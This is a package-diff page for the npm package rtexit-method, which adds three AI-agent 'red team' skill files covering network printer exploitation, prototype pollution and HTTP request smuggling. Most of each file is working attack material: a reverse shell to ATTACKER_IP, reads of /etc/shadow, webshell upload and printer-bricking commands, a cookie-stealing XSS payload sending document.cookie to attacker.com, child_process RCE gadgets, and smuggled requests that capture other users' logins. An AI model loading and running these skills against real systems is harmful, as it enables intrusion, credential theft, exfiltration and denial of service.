npm - rtexit-method - Versions diffs - 0.1.7 → 0.1.9 - Mend

rtexit-method 0.1.7 → 0.1.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (18) hide show

package/packaged-assets/.agents/skills/rt-printer-attacks/SKILL.md ADDED Viewed

@@ -0,0 +1,213 @@
+---
+name: rt-printer-attacks
+description: "Network printer exploitation skill for authorized engagements. PRET (Printer Exploitation Toolkit) for PostScript and PJL attacks, printer credential extraction, stored document retrieval, printer as network pivot point, SNMP community string abuse, IPP exploitation, printer firmware attacks, and using printers as covert C2 storage. Use when network printers are in scope or when pivoting through printer VLANs."
+---
+# rt-printer-attacks — Network Printer Exploitation
+## Overview
+Network printers are overlooked in most security assessments but are high-value targets: they store copies of every printed document, often have unpatched firmware, sit on multiple VLANs, have weak or no authentication, and can be used as persistent storage for attacker data. Most enterprise printers speak PostScript, PJL, and PCL — each with exploitable features.
+---
+## Phase 1 — Discovery & Fingerprinting
+```bash
+# Printer-specific ports
+nmap -sV -p 9100,515,631,161,443,80 PRINTER_IP
+# 9100 = RAW printing (JetDirect)
+# 515  = LPD/LPR
+# 631  = IPP (Internet Printing Protocol)
+# 161  = SNMP
+# 80   = Web management UI
+# Discover printers on network
+nmap -p 9100 --open 10.10.10.0/24
+nmap --script printer-info 10.10.10.0/24
+# SNMP community string (often 'public')
+snmpwalk -v2c -c public PRINTER_IP .1.3.6.1.2.1.43
+# Returns: printer model, serial, status, paper level, etc.
+# Web UI fingerprinting
+curl http://PRINTER_IP/
+# HP: /hp/device/index.htm
+# Xerox: /wps/mydoc.html
+# Canon: /English/pages/top.htm
+# Ricoh: /web/entry.html
+```
+---
+## Phase 2 — PRET (Printer Exploitation Toolkit)
+```bash
+# PRET = Python tool for attacking PostScript, PJL, and PCL printers
+git clone https://github.com/RUB-NDS/PRET
+pip3 install -r PRET/requirements.txt
+# Connect via RAW port (9100) — most common
+python3 PRET/pret.py PRINTER_IP pjl
+python3 PRET/pret.py PRINTER_IP postscript
+python3 PRET/pret.py PRINTER_IP pcl
+# PJL attacks (Printer Job Language)
+python3 PRET/pret.py PRINTER_IP pjl
+  # Once connected:
+  info variables    # Printer config variables
+  info status       # Current status
+  info id           # Device ID and firmware
+  # Read filesystem
+  ls /             # List root filesystem
+  ls /etc/         # Config files
+  cat /etc/shadow  # Credential files (some printers run Linux)
+  # Get stored jobs / documents
+  ls /jobs/        # Pending print jobs
+  get /jobs/001.ps # Download print job (may contain sensitive docs)
+  # Set config (denial of service or persistence)
+  set TIMEOUT=0    # Brick printer until power cycle
+  # Filesystem write
+  put webshell.php /var/www/html/  # If printer runs web server
+# PostScript attacks
+python3 PRET/pret.py PRINTER_IP postscript
+  # Execute PostScript code
+  # Read filesystem via PostScript file operations
+  exec "(cat /etc/passwd) run"
+  # SSRF via PostScript
+  exec "(http://169.254.169.254/) run"
+```
+---
+## Phase 3 — Stored Document Retrieval
+```bash
+# Many printers store copies of documents
+# HR docs, financial reports, executive emails all pass through
+# Via PJL
+python3 PRET/pret.py PRINTER_IP pjl
+  ls /savedjobs/
+  get /savedjobs/confidential_report.pdf
+# Via web UI (if no auth)
+curl http://PRINTER_IP/hp/device/ScannerImages/
+# Ricoh stored docs
+curl http://PRINTER_IP/web/entry.html?func=FUNC&page=PrintFunc&subPage=JobList
+# IPP (Internet Printing Protocol) — get job list
+curl -X POST http://PRINTER_IP:631/printers/HP_LaserJet \
+  -H "Content-Type: application/ipp" \
+  --data-binary @get_jobs_request.ipp
+# SNMP — get print job info
+snmpwalk -v2c -c public PRINTER_IP .1.3.6.1.2.1.43.11
+```
+---
+## Phase 4 — Credential Extraction
+```bash
+# Printers store LDAP, email, SMB credentials for scanning features
+# Via web UI (no auth — very common)
+curl http://PRINTER_IP/hp/device/ldap_settings.xml
+curl http://PRINTER_IP/config.xml
+# May contain: LDAP bind password, email server credentials, SMB share creds
+# Via SNMP
+snmpwalk -v2c -c public PRINTER_IP .1.3.6.1.4.1.11.2.3.9.4.2
+# HP MIB: contains email/LDAP config
+# Via PJL filesystem read
+python3 PRET/pret.py PRINTER_IP pjl
+  cat /etc/ldap.conf
+  cat /var/spool/samba/credentials.txt
+  ls /etc/
+```
+---
+## Phase 5 — Printer as Network Pivot
+```bash
+# Printers often sit on multiple VLANs:
+# - Office VLAN (users connect to print)
+# - Server VLAN (for file scanning)
+# - Management VLAN
+# Use printer as proxy into otherwise-inaccessible networks
+# If printer runs Linux (HP, Xerox, Ricoh often do):
+python3 PRET/pret.py PRINTER_IP pjl
+  # Check if netcat/ncat available
+  exec "which nc ncat netcat"
+  # Reverse shell from printer
+  exec "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
+  # Once you have shell on printer:
+  ip addr show  # Check all interfaces — printer may be on 2-3 networks
+  ip route      # Check routing table
+  # Scan internal networks reachable from printer
+  for i in $(seq 1 254); do
+    ping -c1 -W1 10.20.0.$i &>/dev/null && echo "UP: 10.20.0.$i"
+  done
+# Printer as data drop (covert storage)
+# Upload stolen data to printer filesystem
+python3 PRET/pret.py PRINTER_IP pjl
+  put exfil_data.zip /tmp/
+# Data persists until printer is power cycled or storage wiped
+```
+---
+## Phase 6 — DoS & Firmware Attacks
+```bash
+# Infinite print loop
+python3 PRET/pret.py PRINTER_IP pjl
+  flood  # Sends endless print jobs
+# Printer crash via malformed PJL
+echo -e '\x1b%-12345X@PJL \r\n@PJL SET SERVICEMODE=HPBOISEID\r\n' | nc PRINTER_IP 9100
+# Firmware downgrade (if old vulnerable firmware available)
+# HP: upload .bdl firmware file via web UI
+curl -X POST http://PRINTER_IP/hp/device/update \
+  -F "firmware=@old_vulnerable_firmware.bdl"
+# Change admin password via SNMP
+snmpset -v2c -c private PRINTER_IP \
+  .1.3.6.1.4.1.11.2.3.9.4.2.1.1.3.3.0 s "newpassword"
+```
+---
+## Skill Levels
+**BEGINNER:** PRET PJL connection + info commands + web UI default credential testing
+**INTERMEDIATE:** Stored document retrieval + credential extraction from config files + SNMP enumeration
+**ADVANCED:** Printer filesystem access + reverse shell from printer + pivot into secondary VLANs
+**EXPERT:** Firmware manipulation + printer as persistent C2 storage + cross-VLAN attacks via printer
+---
+## References
+- PRET: https://github.com/RUB-NDS/PRET
+- Printer Hacking research (RUB): https://www.nds.rub.de/research/printer-hacking/
+- SNMP printer MIBs: http://www.mibdepot.com
+- MITRE T1012: https://attack.mitre.org/techniques/T1012/

package/packaged-assets/.agents/skills/rt-prototype-pollution/SKILL.md ADDED Viewed

@@ -0,0 +1,154 @@
+---
+name: rt-prototype-pollution
+description: "Prototype pollution attack skill for authorized engagements. Client-side prototype pollution to DOM XSS and cookie theft, server-side prototype pollution in Node.js to RCE, gadget chains for PP escalation, AST injection via prototype pollution, property injection in lodash/merge functions, and automated detection with PPScan. Use when testing JavaScript applications (both browser-side and Node.js server-side)."
+---
+# rt-prototype-pollution — Prototype Pollution
+## Overview
+JavaScript's prototype chain allows every object to inherit properties from its prototype. Prototype pollution injects properties into `Object.prototype` — affecting ALL objects in the application. Client-side: leads to DOM XSS. Server-side: leads to RCE, authentication bypass, and privilege escalation.
+---
+## Phase 1 — Detection
+```javascript
+// Client-side detection in browser console
+// Inject test property into Object.prototype
+?__proto__[testprop]=testvalue
+// Or in JSON body: {"__proto__": {"testprop": "testvalue"}}
+// Check if it worked
+window.testprop  // Should be "testvalue" if polluted
+({}).testprop    // Any empty object should have it
+// Server-side detection
+// Send request with __proto__ in JSON
+fetch('/api/user/update', {
+    method: 'POST',
+    body: JSON.stringify({"__proto__": {"polluted": true}})
+})
+// If server responds differently → server-side PP
+// Automated: PPScan
+npm install -g ppscan
+ppscan --url https://target.com
+```
+---
+## Phase 2 — Client-Side PP to DOM XSS
+```bash
+# Inject via URL query parameter
+https://target.com/?__proto__[innerHTML]=<img src=x onerror=alert(1)>
+https://target.com/?__proto__[src]=//attacker.com/evil.js
+# Inject via JSON body parameter
+{"username": "test", "__proto__": {"isAdmin": true}}
+{"name": "x", "constructor": {"prototype": {"isAdmin": true}}}
+{"name": "x", "__proto__.__proto__": {"isAdmin": true}}
+# Common gadgets (properties that cause XSS when polluted)
+__proto__[innerHTML]       → sets innerHTML of elements
+__proto__[src]             → sets src of script/img elements
+__proto__[href]            → sets href causing XSS
+__proto__[transport_url]   → jQuery JSONP
+__proto__[sequence]        → DOMPurify bypass
+__proto__[NODE_NAME]       → specific framework gadgets
+# PayloadsAllTheThings PP gadgets
+# https://github.com/HoLyVieR/prototype-pollution-nsec18
+# Exploit: steal cookies via polluted property
+https://target.com/?__proto__[innerHTML]=<script>fetch('https://attacker.com?c='+document.cookie)</script>
+```
+---
+## Phase 3 — Server-Side PP to RCE
+```javascript
+// Node.js server-side prototype pollution → RCE
+// Lodash merge (CVE-2019-10744)
+const _ = require('lodash');
+_.merge({}, JSON.parse('{"__proto__":{"shell":"node","NODE_OPTIONS":"--require /proc/self/cmdline"}}'));
+// Pollutes process.mainModule.require or shell property
+// express-fileupload PP (CVE-2020-7699)
+// POST with file upload + __proto__ in field name → pollutes globally
+// Handlebars template injection via PP (CVE-2019-19919)
+// Pollute __proto__.pendingContent → template execution
+const payload = '{"__proto__": {"pendingContent": "{{#with \"s\" as |string|}}{{#with \"e\"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub \"constructor\")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push \"return require(\'child_process\').execSync(\'id\').toString()\"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}"}}';
+// Detect via spawn/exec pollution
+// If shell property polluted → child_process.exec uses it
+const {exec} = require('child_process');
+exec('id');  // If __proto__.shell='node' → executes node instead
+```
+---
+## Phase 4 — Escalation via Gadgets
+```javascript
+// Property injection gadgets for various frameworks
+// Express.js
+__proto__[admin] = true          // Bypass auth checks: if(req.user.admin)
+__proto__[authorized] = true
+__proto__[role] = "admin"
+// ejs template RCE gadget
+__proto__[outputFunctionName] = "x; process.mainModule.require('child_process').execSync('id'); //"
+// Pug template
+__proto__[compileDebug] = 1
+__proto__[self] = 1
+// Finding gadgets manually
+// Search codebase for dangerous property accesses that could be polluted:
+grep -r "opts\.\|options\.\|config\." src/ | grep -v "==" | grep -v "!=="
+# Properties read from objects without hasOwnProperty check = potential gadgets
+```
+---
+## Phase 5 — Fix Bypass Techniques
+```javascript
+// App uses Object.create(null) to avoid PP? Try:
+{"constructor": {"prototype": {"polluted": true}}}
+// App filters __proto__? Use:
+{"constructor": {"prototype": {"polluted": true}}}
+// or URL encoded: %5F%5Fproto%5F%5F
+// Deep merge bypass
+{"a": {"__proto__": {"polluted": true}}}
+// Some merge functions recurse → pollutes at depth
+```
+---
+## Skill Levels
+**BEGINNER:** DOM XSS via URL-based PP · isAdmin bypass via polluted property
+**INTERMEDIATE:** PP gadget research in target's framework · Server-side PP detection
+**ADVANCED:** ejs/Pug RCE via PP gadgets · Lodash merge exploitation · PP chain to full server compromise
+**EXPERT:** Custom gadget discovery · PP + deserialization chains · 0-day PP in popular frameworks
+---
+## References
+- PortSwigger PP: https://portswigger.net/web-security/prototype-pollution
+- PP gadgets research: https://github.com/BlackFan/client-side-prototype-pollution
+- Server-side PP: https://portswigger.net/research/server-side-prototype-pollution
+- MITRE T1059.007: https://attack.mitre.org/techniques/T1059/007/

package/packaged-assets/.agents/skills/rt-request-smuggling/SKILL.md ADDED Viewed

@@ -0,0 +1,187 @@
+---
+name: rt-request-smuggling
+description: "HTTP Request Smuggling attack skill for authorized engagements. CL.TE and TE.CL desync attacks, HTTP/2 downgrade smuggling (H2.CL, H2.TE), request queue poisoning for account takeover, smuggling to bypass front-end security controls, capturing other users' requests, response queue poisoning, and Burp Suite smuggling detection. Use when testing applications behind reverse proxies, load balancers, or CDNs."
+---
+# rt-request-smuggling — HTTP Request Smuggling
+## Overview
+HTTP Request Smuggling exploits disagreements between front-end (proxy/CDN) and back-end servers about where one HTTP request ends and the next begins. The front-end sees one request; the back-end sees two — the second being a "smuggled" request that can poison the queue, hijack other users' requests, or bypass security controls.
+**Conditions:** Front-end + back-end server, both parsing HTTP differently (Content-Length vs Transfer-Encoding).
+---
+## Phase 1 — Detection
+```http
+# CL.TE detection — front-end uses Content-Length, back-end uses TE
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 6
+Transfer-Encoding: chunked
+0
+X
+```
+```bash
+# Burp Suite — HTTP Request Smuggler extension (BApp Store)
+# Scanner → Scan → HTTP Request Smuggling
+# Manual timing-based detection
+# If response takes ~10s with no timeout set → backend stalled on incomplete chunk → CL.TE vulnerable
+# smuggler.py — automated detection
+git clone https://github.com/defparam/smuggler
+python3 smuggler.py -u https://target.com/
+```
+---
+## Phase 2 — CL.TE (Front-end: Content-Length, Back-end: Transfer-Encoding)
+```http
+# Smuggled prefix poisoning
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 13
+Transfer-Encoding: chunked
+0
+SMUGGLED
+```
+```http
+# Capture next user's request (account takeover)
+POST / HTTP/1.1
+Host: target.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 130
+Transfer-Encoding: chunked
+0
+POST /login HTTP/1.1
+Host: target.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 100
+username=captured_
+# Next user's request body appends here → steals their credentials
+```
+---
+## Phase 3 — TE.CL (Front-end: Transfer-Encoding, Back-end: Content-Length)
+```http
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 4
+Transfer-Encoding: chunked
+5e
+POST /admin HTTP/1.1
+Host: target.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 15
+admin=true&x=
+0
+```
+---
+## Phase 4 — H2.CL / H2.TE (HTTP/2 Downgrade Smuggling)
+```http
+# HTTP/2 requests downgraded to HTTP/1.1 at the proxy
+# Inject Content-Length or Transfer-Encoding in HTTP/2 headers
+# H2.CL — inject Content-Length in HTTP/2
+:method POST
+:path /
+:authority target.com
+content-type application/x-www-form-urlencoded
+content-length 0
+# H2.TE — inject Transfer-Encoding in HTTP/2 pseudo-header
+:method POST
+transfer-encoding chunked
+# Body follows with chunked encoding
+```
+```bash
+# Burp Suite — HTTP/2 smuggling
+# Repeater → toggle HTTP/2 → inject headers manually
+# Inspector pane → add custom headers without content-length auto-calculation
+```
+---
+## Phase 5 — Security Control Bypass
+```http
+# Bypass front-end IP restriction
+# Front-end blocks /admin from external IPs
+# Smuggle request to appear as internal
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 116
+Transfer-Encoding: chunked
+0
+GET /admin HTTP/1.1
+Host: target.com
+X-Forwarded-For: 127.0.0.1
+X-Original-URL: /admin
+Content-Length: 10
+x=1
+```
+---
+## Phase 6 — Response Queue Poisoning
+```http
+# Poison response queue → steal other users' responses
+# Works when backend uses persistent connections
+POST / HTTP/1.1
+Host: target.com
+Content-Length: 43
+Transfer-Encoding: chunked
+0
+GET /admin/delete?user=victim HTTP/1.1
+X: X
+```
+---
+## Skill Levels
+**BEGINNER:** Burp HTTP Request Smuggler extension for automated detection
+**INTERMEDIATE:** Manual CL.TE/TE.CL with Burp Repeater · Security control bypass
+**ADVANCED:** Request capture for account takeover · H2.CL/H2.TE HTTP/2 smuggling
+**EXPERT:** Response queue poisoning · Custom timing-based detection · CDN-specific variants
+---
+## References
+- PortSwigger Research: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
+- PortSwigger Lab: https://portswigger.net/web-security/request-smuggling
+- smuggler.py: https://github.com/defparam/smuggler
+- MITRE T1190: https://attack.mitre.org/techniques/T1190/